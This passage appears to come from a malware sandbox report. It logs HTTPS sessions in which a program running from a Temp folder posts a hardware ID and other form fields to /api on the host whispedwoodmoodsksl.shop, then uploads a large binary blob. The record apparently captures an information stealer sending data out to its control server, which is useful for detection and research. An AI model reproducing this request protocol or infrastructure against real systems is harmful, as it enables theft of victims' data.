                                                                      2024-05-26 08:28:36 UTC8779OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 32 45 36 39 30 46 37 41 45 45 45 38 34 41 36 38 38 39 44 35 41 44 31 30 45 42 39 44 43 36 38 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 73 77 67 35 45 47 2d 2d 0d 0a 2d 2d 62
                                                                      Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"02E690F7AEEE84A6889D5AD10EB9DC68--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"swg5EG----b
                                                                      2024-05-26 08:28:36 UTC814INHTTP/1.1 200 OK
                                                                      Date: Sun, 26 May 2024 08:28:36 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Set-Cookie: PHPSESSID=2lq37j1umjno9nkajqurq2f8l7; expires=Thu, 19-Sep-2024 02:15:15 GMT; Max-Age=9999999; path=/
                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                      Pragma: no-cache
                                                                      CF-Cache-Status: DYNAMIC
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WbNAAXR9IEis7SD8ht24KKZD00jXxrqxhLiWjm7F8XI%2F%2FUnHjfULs5xpwRlweK8xdOG0yVOWi%2FpnyLSb%2Fr66JvJFvpK6kD57CJNUYZ899HeJOrWsUiuhODBUxCphSoIJdN8Wd%2BssKP7bTx0%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 889c64860dec41e7-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      2024-05-26 08:28:36 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a
                                                                      Data Ascii: fok 8.46.123.175
                                                                      2024-05-26 08:28:36 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      4192.168.2.449752188.114.96.34437932C:\Users\user\AppData\Local\Temp\38F9.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-05-26 08:28:37 UTC290OUTPOST /api HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                      Content-Length: 20432
                                                                      Host: whispedwoodmoodsksl.shop
                                                                      2024-05-26 08:28:37 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 32 45 36 39 30 46 37 41 45 45 45 38 34 41 36 38 38 39 44 35 41 44 31 30 45 42 39 44 43 36 38 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 73 77 67 35 45 47 2d 2d 0d 0a 2d 2d 62
                                                                      Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"02E690F7AEEE84A6889D5AD10EB9DC68--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"swg5EG----b
                                                                      2024-05-26 08:28:37 UTC5101OUTData Raw: 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00
                                                                      Data Ascii: `M?lrQMn 64F6(X&7~`aO
                                                                      2024-05-26 08:28:38 UTC810INHTTP/1.1 200 OK
                                                                      Date: Sun, 26 May 2024 08:28:38 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Set-Cookie: PHPSESSID=qmdnf6pp0q3juk65m2kt91h74v; expires=Thu, 19-Sep-2024 02:15:17 GMT; Max-Age=9999999; path=/
                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                      Pragma: no-cache
                                                                      CF-Cache-Status: DYNAMIC
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=l1clPrnAALLI6ME2olhv9DwCO3C2TEc0CSADy6SfN9hspSInaRB3RkpjXTVUhemrtOjn1Opk4iz6h%2BfhRJjsZbz75dS488UgDamw9aUimW4sdf0UyA8rBw%2FO68yZnl76U6%2BzUP8MfpijVTw%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 889c648fad098c11-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      2024-05-26 08:28:38 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a
                                                                      Data Ascii: fok 8.46.123.175
                                                                      2024-05-26 08:28:38 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      5192.168.2.449753188.114.96.34437932C:\Users\user\AppData\Local\Temp\38F9.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-05-26 08:28:39 UTC289OUTPOST /api HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                      Content-Length: 3789
                                                                      Host: whispedwoodmoodsksl.shop
                                                                      2024-05-26 08:28:39 UTC3789OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 32 45 36 39 30 46 37 41 45 45 45 38 34 41 36 38 38 39 44 35 41 44 31 30 45 42 39 44 43 36 38 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 73 77 67 35 45 47 2d 2d 0d 0a 2d 2d 62
                                                                      Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"02E690F7AEEE84A6889D5AD10EB9DC68--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"swg5EG----b
                                                                      2024-05-26 08:28:40 UTC818INHTTP/1.1 200 OK
                                                                      Date: Sun, 26 May 2024 08:28:40 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Set-Cookie: PHPSESSID=krv5i5i5sfaa8ikv44lm4gas8n; expires=Thu, 19-Sep-2024 02:15:18 GMT; Max-Age=9999999; path=/
                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                      Pragma: no-cache
                                                                      CF-Cache-Status: DYNAMIC
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=y4cXoMeUZHQ%2B4MX8tZ4TtJudiktr7LrxWuFFEwB25ykQkwHDtZAh%2BXgf9YDwABL6Ge2v8EvfrtfZycMogCp3Dh13p2lun%2FGbWRzBzl4n21sIkx5%2BoX3EbkP6f%2BW%2Bu9MEWS3y%2BS6GmD0EIYM%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 889c649a2a4b7290-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      2024-05-26 08:28:40 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a
                                                                      Data Ascii: fok 8.46.123.175
                                                                      2024-05-26 08:28:40 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      6192.168.2.449755188.114.96.34437932C:\Users\user\AppData\Local\Temp\38F9.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-05-26 08:28:42 UTC289OUTPOST /api HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                      Content-Length: 1267
                                                                      Host: whispedwoodmoodsksl.shop
                                                                      2024-05-26 08:28:42 UTC1267OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 32 45 36 39 30 46 37 41 45 45 45 38 34 41 36 38 38 39 44 35 41 44 31 30 45 42 39 44 43 36 38 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 73 77 67 35 45 47 2d 2d 0d 0a 2d 2d 62
                                                                      Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"02E690F7AEEE84A6889D5AD10EB9DC68--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"swg5EG----b
                                                                      2024-05-26 08:28:44 UTC820INHTTP/1.1 200 OK
                                                                      Date: Sun, 26 May 2024 08:28:44 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Set-Cookie: PHPSESSID=1r3g81k441cl1sragucuh8h79a; expires=Thu, 19-Sep-2024 02:15:23 GMT; Max-Age=9999999; path=/
                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                      Pragma: no-cache
                                                                      CF-Cache-Status: DYNAMIC
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U8ri7ueNih%2FW2iHkgdQNKEv0PlxuKFvLNiBhfIKwi8AP2TstZLCGVCw6NlH%2BJQqhhOX02D8agSkJkKzq1UkIfVQ9%2BkWNybK4JwK3%2F4hYhpFfb%2B2UXMmdN0R%2FC%2FUK0cXMuhhmYQ%2BYVCUACus%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 889c64af9e5778db-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      2024-05-26 08:28:44 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a
                                                                      Data Ascii: fok 8.46.123.175
                                                                      2024-05-26 08:28:44 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      7192.168.2.449756188.114.96.34437932C:\Users\user\AppData\Local\Temp\38F9.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-05-26 08:28:47 UTC291OUTPOST /api HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                      Content-Length: 548841
                                                                      Host: whispedwoodmoodsksl.shop
                                                                      2024-05-26 08:28:47 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 32 45 36 39 30 46 37 41 45 45 45 38 34 41 36 38 38 39 44 35 41 44 31 30 45 42 39 44 43 36 38 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 73 77 67 35 45 47 2d 2d 0d 0a 2d 2d 62
                                                                      Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"02E690F7AEEE84A6889D5AD10EB9DC68--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"swg5EG----b
                                                                      2024-05-26 08:28:47 UTC15331OUTData Raw: 95 aa 95 e2 07 49 6d fc d4 75 8c 89 13 dd cb 36 7e 60 f2 29 70 3c 9c aa 7c ff 3c 02 ea 0d 51 1a 0a df 8d 1b 06 3c c9 31 b1 fe 3f 97 11 f6 55 00 4d 5c ce cd b6 f8 cb 80 ed 93 7c 74 1a 5b 41 cc 74 81 ee 69 2c 10 bb a2 0e 2b e5 13 92 43 7c 0b ce 3a 0b 0a 04 48 13 d7 6f 8c 9f 88 13 a0 cd 17 ab 4f c5 df 09 b7 db 88 08 38 16 b6 97 61 f4 87 90 ad b3 f3 41 94 71 10 5e 1f 94 74 04 f9 4f e6 41 70 36 54 29 85 3f d2 0c 17 ee 07 0e 5a 9d 80 5c cd f3 16 44 aa 6f 5c 5a 14 b8 f1 6f cb c7 01 97 be b1 be 77 69 23 f6 43 4e ef d0 a1 9a f5 1b 57 a9 50 81 7d 45 87 49 c9 d5 c4 10 d7 c9 b4 28 14 dc bb df 47 c4 08 13 8a 4c 3b 31 34 2d 07 03 92 fc e3 a9 b9 a0 38 d8 d1 65 cd a1 41 03 3f 1d b0 74 f0 7d 9f 1e d8 6e 2c bf fb e6 d4 e8 e0 c5 dd fd de 37 4e f6 4a f7 4e 8e 29 da bf 75 28
                                                                      Data Ascii: Imu6~`)p<|<Q<1?UM\|t[Ati,+C|:HoO8aAq^tOAp6T)?Z\Do\Zowi#CNWP}EI(GL;14-8eA?t}n,7NJN)u(
                                                                      2024-05-26 08:28:47 UTC15331OUTData Raw: e4 8b 61 de 63 9a a5 43 06 f2 7c ac e4 a4 2e 2d b5 4e a4 d4 4b 74 61 6a b5 14 de b6 06 e3 03 86 6b a9 26 dc ef 1f c7 e3 ca 46 27 a7 a7 a3 eb f4 27 94 9c 55 c0 4e c7 08 88 20 b7 0f 4f b5 0c 24 aa 28 29 46 c4 fd 7a 7f e2 98 7c a4 81 53 97 21 ce ef b8 0a 9f 1f 2f 5f ad ab 83 7b d4 58 f6 eb 5d 06 81 ff ae 9a f5 b4 c0 ab 12 1e 1e cd cf 23 1e 8b e6 17 5a 53 ea 5b 12 da d9 24 a7 fd 6a a3 f6 51 1c 41 0e 25 b4 07 67 f2 50 77 49 bc 52 e5 95 60 6a cb 9d d0 da 3d f9 93 72 fd fc df d5 b3 26 af 8c fe 3e 1b 7d 35 3d 64 1f df dd 20 d1 3e 6a b3 e1 f3 c6 68 d8 5f fc 97 62 ed 54 08 3f fa 27 b3 7b dd e9 8a df a3 4c 43 44 67 96 68 56 6e 8b ac d0 fa 70 ec b1 21 a8 3b 6a 4b e4 e9 8e 02 95 74 96 f2 04 2f 5d 24 43 e2 05 3b 58 34 5d 8c 39 be 39 cb ed 7e cf d1 6f 35 c1 7b e8 ff da
                                                                      Data Ascii: acC|.-NKtajk&F''UN O$()Fz|S!/_{X]#ZS[$jQA%gPwIR`j=r&>}5=d >jh_bT?'{LCDghVnp!;jKt/]$C;X4]99~o5{
                                                                      2024-05-26 08:28:47 UTC15331OUTData Raw: b1 db 1b 28 69 4c 33 7a 79 eb 59 2c 55 8c 5d 76 73 37 3d ca fa d3 b3 bd 9f d0 30 a3 72 c9 e5 c0 c6 8b 7e 81 9e cc 8a cf 23 35 15 2f ff 61 31 b9 f9 b1 a7 ab a7 56 fe 38 31 a9 cd e7 84 ba c6 7e 6e fd a6 fa 1a bb db bc e2 5c fb b4 3f 93 9a b7 17 38 0a 17 01 cc ad d3 c0 f1 c2 0e 9e 9d 3a bd b2 85 c2 2c b7 61 09 56 e9 81 36 0e 47 1d 1f 6e f3 75 fd d1 bd 08 ab 09 b9 c9 02 69 20 1b 13 72 cb 6b 1e a2 db 85 da 1b 7c 50 c7 cf f4 be 21 b7 99 3c 0d b7 d0 02 0e 1f 7f 6d 20 3e c2 14 78 c8 ff 7f 47 a0 23 99 a3 10 28 43 43 4d 06 e0 5a 59 2e 22 b2 24 22 35 4b 51 e0 42 c8 53 6d be 35 ba b8 2a f6 d5 2b c5 21 ad 1f 80 b0 87 e8 88 79 86 25 7e 99 74 f5 e0 06 16 3f 31 8c 52 41 81 c4 8f 9c 10 9b 08 9b c4 50 c3 26 ab d2 20 da f8 6c e3 82 ab 01 eb 2e dd f5 c6 4d e3 de 19 c3 b5 3e
                                                                      Data Ascii: (iL3zyY,U]vs7=0r~#5/a1V81~n\?8:,aV6Gnui rk|P!<m >xG#(CCMZY."$"5KQBSm5*+!y%~t?1RAP& l.M>
                                                                      2024-05-26 08:28:47 UTC15331OUTData Raw: 73 ff 34 51 0e a2 2c 85 49 3d e3 a0 ff 17 15 2e d3 97 e7 bd b4 ed 69 84 79 be 8c 7c ed 02 98 4a 98 13 f2 6a 7e 8f 19 cb 48 34 b5 27 fe 1b 89 40 53 43 c5 f6 48 63 e7 51 9e 68 f3 76 94 b9 93 c6 af cb f8 97 7e 5b ef 41 74 c7 b9 00 56 1f 82 c4 32 02 98 be e9 74 9b 35 33 bb f3 e4 ea 09 ce 35 03 3c 7e 4a 37 f8 ab 64 20 96 07 23 8c e9 55 18 47 33 a2 8a ba 8d e6 64 3f 58 33 9a 8c b1 e1 42 8d f2 56 ee 99 4e 49 a3 23 e3 77 66 86 2a e2 37 5f 0a 50 f8 39 77 46 83 b1 f5 a4 da eb 4c 66 c4 df 83 e4 3a 89 48 e3 3a 04 3b 10 26 51 8e ba 44 a4 f5 a1 19 71 e5 ea e9 f0 3d be a5 a7 7c 2a 92 c9 96 f6 19 09 38 21 c1 fd 8c 92 3d bb 74 b8 a4 ef b2 a6 37 9e 49 44 1e e6 33 a9 fa b1 d2 a4 75 73 35 b3 75 8b 3b ac 49 07 23 04 5e 0f a8 8d 67 bd e1 02 7f be 8e 3d 89 ac 31 d2 cd 4a e0 15
                                                                      Data Ascii: s4Q,I=.iy|Jj~H4'@SCHcQhv~[AtV2t535<~J7d #UG3d?X3BVNI#wf*7_P9wFLf:H:;&QDq=|*8!=t7ID3us5u;I#^g=1J
                                                                      2024-05-26 08:28:47 UTC15331OUTData Raw: 6e 0c 29 49 cd 54 8e fb 91 a8 1b 4c 8a 23 7d 7b 18 f5 fc b0 ac 28 70 6c 92 1b 8a d4 f9 fa 6d c9 32 bd a2 a3 29 9e 73 45 58 fc c7 df dc 0e 57 ec 1d 38 c8 1f 3a 81 09 f5 47 fd 58 c0 c5 66 d5 99 d0 cc c3 26 42 24 38 f3 4f 02 2b bd 58 09 2a d7 c6 c1 b2 6f 7a 45 61 f6 6e 19 d8 10 03 bf e4 62 d7 47 89 0e b6 bd 3a 4b ac ae ef 96 b0 bd f0 c2 8b a7 ff 3b 4c 73 3d 03 7b 87 4b 5a 84 fe 0a b1 13 55 65 22 a9 b0 cd 58 ad 28 cb 6e 5d ad f6 19 ca 50 f7 c3 bc d7 07 f7 67 9f b9 80 be b9 c6 38 b3 33 53 e4 2a 74 93 aa ae b9 8c 9e 45 2f e7 cc d8 1c 25 d3 59 4b aa b4 31 00 de a2 19 f3 ac 3e 52 9a 08 20 ec 11 8b 52 e2 66 37 6c af 0d fe bb 2e 39 52 c3 ec 9c fa 99 20 77 dc 19 de 07 1a 54 76 f6 3b cc b6 40 18 70 48 8a 21 df 00 53 c3 2e 71 81 07 e2 0c 3d 44 da dd bd be ef fd d6 ec
                                                                      Data Ascii: n)ITL#}{(plm2)sEXW8:GXf&B$8O+X*ozEanbG:K;Ls={KZUe"X(n]Pg83S*tE/%YK1>R Rf7l.9R wTv;@pH!S.q=D
                                                                      2024-05-26 08:28:47 UTC15331OUTData Raw: fe e7 a8 d5 e9 ed f3 df 6e 54 93 d2 95 15 ff b4 8b 38 02 0c 9b c2 21 ec 28 2e 6a 72 c4 47 eb f9 c7 b1 78 97 3b 81 df 8e 3c 5a da ca f4 32 de 27 b2 e1 e5 28 a0 50 dd f3 d2 1b 53 34 7c 19 87 47 7c ff 9d 8e 1d 2b 5e 30 27 f1 7f dd 6c 47 d4 01 69 a7 2a a3 9b d9 e6 a9 be 4f 1c 5c f9 27 75 47 ac 33 0f a2 48 10 26 94 f6 d8 23 c7 e6 6b 21 30 fb 2c 14 22 ca 65 29 43 8e c2 bd 27 39 5a e7 d2 b8 f7 7a d0 31 7d 78 97 8b c4 40 de fb 91 16 6d 9b 9a b5 a2 59 1e 72 25 6b 9a 99 23 d4 29 1a ee 22 59 1c 51 7d 04 58 8c 66 6a a0 be 63 7b ff d2 86 2b 1a ae e2 20 b5 06 6c ec d5 c8 72 c8 da d1 5e 02 f0 d4 38 41 c4 a1 10 3c ab d8 39 3b 4b 64 92 75 78 f0 fb 15 4a e5 ae db 4a cc 91 09 96 a5 58 16 36 ec e7 af 56 ff df 05 be cc c3 cc 92 e2 63 c2 0b 97 63 32 75 30 c6 e7 c9 be bc b3 32
                                                                      Data Ascii: nT8!(.jrGx;<Z2'(PS4|G|+^0'lGi*O\'uG3H&#k!0,"e)C'9Zz1}x@mYr%k#)"YQ}Xfjc{+ lr^8A<9;KduxJJX6Vcc2u02
                                                                      2024-05-26 08:28:47 UTC15331OUTData Raw: f6 cd 2f 0b 42 4a 82 8c 15 db 88 47 07 87 f3 17 0d 6c 7a b3 8b 3b da d1 6d 7f 0c 05 83 c0 23 28 c3 61 6f e9 a5 62 b9 94 11 97 53 9b d2 08 cf 65 e7 4c e3 26 f4 29 44 68 24 d6 0b a9 4e 5d cd 4e dd f5 06 03 5c ce af cb b1 e2 9d f1 f2 c1 df 7d 61 6d 7c 71 d2 37 df a1 fc 6b 53 19 2c bd 1d 7b 59 44 46 13 ba 49 56 11 c1 54 ec 35 48 d8 a8 e2 10 ee e5 98 ee ef 1f 89 a2 28 8c de 5a 25 57 1e e7 e8 d5 57 73 53 fe 01 3d 8a 90 86 d1 31 ad 95 ea 65 0f 6b 4b 9c 98 c8 b0 fa 94 10 ce ed e3 4f 2e b0 2a 1d 9c 3a 92 7b 24 34 f9 c8 c9 f3 ff 4e 9b b1 48 eb a2 3b ec 88 92 6f 6c b1 6d b3 72 51 2b 3d a7 a1 8c 6c 9f c4 9d 17 97 a6 0d 47 3f d9 41 9f 79 9e c0 67 b1 60 5e b8 2f fd 1c d0 5a 38 40 2c 41 20 8e f2 6e ca f6 5f 49 1b c0 02 72 38 74 8e 0f 94 5b b9 ff f2 76 3f f9 04 74 1e e1
                                                                      Data Ascii: /BJGlz;m#(aobSeL&)Dh$N]N\}am|q7kS,{YDFIVT5H(Z%WWsS=1ekKO.*:{$4NH;olmrQ+=lG?Ayg`^/Z8@,A n_Ir8t[v?t
                                                                      2024-05-26 08:28:47 UTC15331OUTData Raw: ff c4 84 33 80 d3 76 f4 03 b2 b8 73 a8 5d 86 a8 0e fd c8 1f ef 7c b7 2e 6b cb 4f 54 9b 13 34 05 80 04 56 2a d5 3d 4f 8d b0 a0 a7 67 84 3e 7a b7 41 7f e8 c4 80 6f fa 93 d6 ee cf 0f f3 cd 04 79 b7 e6 ed 3f 19 51 ff 77 4b 4c 10 84 f8 2c 2e a2 81 36 fe 0a 0e bc 45 17 0a a0 86 c9 64 c9 7f 82 d3 b4 7d 12 37 8f d5 58 1a f3 fb ea 20 18 30 e0 04 39 47 96 da 8b a2 07 38 14 2a 0d 73 25 0f f7 4b 8d b8 c6 63 47 54 e9 02 18 6d 96 67 34 35 18 e0 d7 1f b3 c6 56 00 9f 8a f9 e0 71 91 37 5b 71 fb a6 ad d0 bc 76 3e 7c 66 ce 54 cd 89 53 9b cf 2a 52 8d 79 05 c7 c4 ef 41 b0 51 b7 fe fa 15 07 09 d4 f5 84 09 08 dc 20 e0 1a 70 f5 ca 51 21 bb a9 fc 00 c2 41 2b c4 bd a1 3b b9 76 ad 39 b3 64 17 1b 53 a7 11 ec 65 4b bc 07 e6 35 3a 89 90 74 b0 c6 18 9d b4 89 28 c0 6d 9f cd 49 a0 0b 08
                                                                      Data Ascii: 3vs]|.kOT4V*=Og>zAoy?QwKL,.6Ed}7X 09G8*s%KcGTmg45Vq7[qv>|fTS*RyAQ pQ!A+;v9dSeK5:t(mI
